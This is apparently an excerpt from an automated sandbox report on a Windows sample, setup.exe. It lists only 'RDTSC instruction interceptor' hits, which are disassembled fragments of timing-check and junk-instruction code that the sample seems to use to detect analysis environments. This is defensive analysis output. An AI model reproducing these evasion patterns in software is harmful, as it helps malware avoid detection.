                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFBA1 second address: 3BFBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFC8C second address: 3BFC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFC90 second address: 3BFCA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFCA3 second address: 3BFCBE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48268h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F47D8E48274h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F47D8E48266h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFCBE second address: 3BFCD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 movsx edx, bx 0x0000000a or ecx, dword ptr [ebp+122D294Bh] 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F47D8E3B0A6h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFCD9 second address: 3BFCDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE1F second address: 3BFE31 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F47D8E3B0A6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE31 second address: 3BFE5F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F47D8E48279h 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F47D8E48266h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE5F second address: 3BFE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jbe 00007F47D8E3B0A6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 jmp 00007F47D8E3B0ADh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F47D8E3B0A6h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE8F second address: 3BFE95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE95 second address: 3BFE9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE9B second address: 3BFE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFE9F second address: 3BFEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F47D8E3B0AEh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFFBA second address: 3BFFC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BFFC7 second address: 3BFFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C01AC second address: 3C01B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C0576 second address: 3C05BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F47D8E3B0A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edx, dword ptr [ebp+122D3818h] 0x0000002b push 0000001Eh 0x0000002d jmp 00007F47D8E3B0ABh 0x00000032 nop 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007F47D8E3B0A6h 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 367AF3 second address: 367B07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F47D8E48266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 367B07 second address: 367B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8236 second address: 3E8250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48275h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8250 second address: 3E8256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8256 second address: 3E8260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F47D8E48266h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8666 second address: 3E866A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E87EF second address: 3E87F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8973 second address: 3E8979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8979 second address: 3E897D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E897D second address: 3E8993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3E8AC1 second address: 3E8ACE instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F1861 second address: 3F186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47D8E3B0A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F1E0B second address: 3F1E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F1E11 second address: 3F1E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F214F second address: 3F215A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47D8E48266h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F22F9 second address: 3F22FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F22FD second address: 3F230F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F47D8E4826Ch 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F230F second address: 3F233C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F47D8E3B0B9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F29C4 second address: 3F29E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E48276h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F12CE second address: 3F12D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F12D7 second address: 3F12DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F12DE second address: 3F12E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3F12E4 second address: 3F12E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FD6AD second address: 3FD6D5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0B9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F47D8E3B0A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FDCE6 second address: 3FDCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FDCEA second address: 3FDCF7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FDCF7 second address: 3FDCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FDFAB second address: 3FDFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FDFAF second address: 3FDFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F47D8E48268h 0x0000000c jmp 00007F47D8E48275h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FE285 second address: 3FE2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FE2A7 second address: 3FE2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FE2AB second address: 3FE2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F47D8E3B0A8h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FE2C6 second address: 3FE2CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3FE2CC second address: 3FE2E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B3h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 401ABC second address: 401AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 401AC1 second address: 401B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007F47D8E3B0AEh 0x00000012 jo 00007F47D8E3B0A6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007F47D8E3B0B9h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 401B0A second address: 401B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Ah 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 401B19 second address: 401B23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 401368 second address: 4013B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 jmp 00007F47D8E48273h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F47D8E48268h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F47D8E48272h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4016C4 second address: 4016C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4016C9 second address: 4016E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47D8E48274h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 403F9D second address: 403FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 403FA5 second address: 403FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E48270h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3700B8 second address: 3700C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3700C5 second address: 3700D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3700D1 second address: 3700D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 403B58 second address: 403B60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 403CCA second address: 403CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AE6B second address: 40AE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AE71 second address: 40AE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AE75 second address: 40AE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AE79 second address: 40AE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AE7F second address: 40AEAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E4826Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47D8E4826Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F47D8E48266h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AEAF second address: 40AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AEC2 second address: 40AEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48279h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AEE1 second address: 40AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AEE5 second address: 40AEE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40AEE9 second address: 40AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 409FD2 second address: 409FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 409FEC second address: 409FFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F47D8E3B0A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 409FFB second address: 40A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40A001 second address: 40A01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E3B0AFh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40A199 second address: 40A1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F47D8E48278h 0x0000000f pop edx 0x00000010 jnc 00007F47D8E48268h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40A1CA second address: 40A1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40E420 second address: 40E46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push edi 0x00000008 jmp 00007F47D8E48274h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jns 00007F47D8E4826Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F47D8E48270h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40E5BC second address: 40E5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40E5C6 second address: 40E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F47D8E48266h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 40EA1B second address: 40EA27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4123D2 second address: 4123DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 412825 second address: 412852 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0ACh 0x00000008 jp 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F47D8E3B0B9h 0x00000017 jmp 00007F47D8E3B0B1h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 412852 second address: 412858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4129B1 second address: 4129C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B0h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4129C9 second address: 4129DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A18C second address: 41A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A34B second address: 41A34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A34F second address: 41A371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F47D8E3B0A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
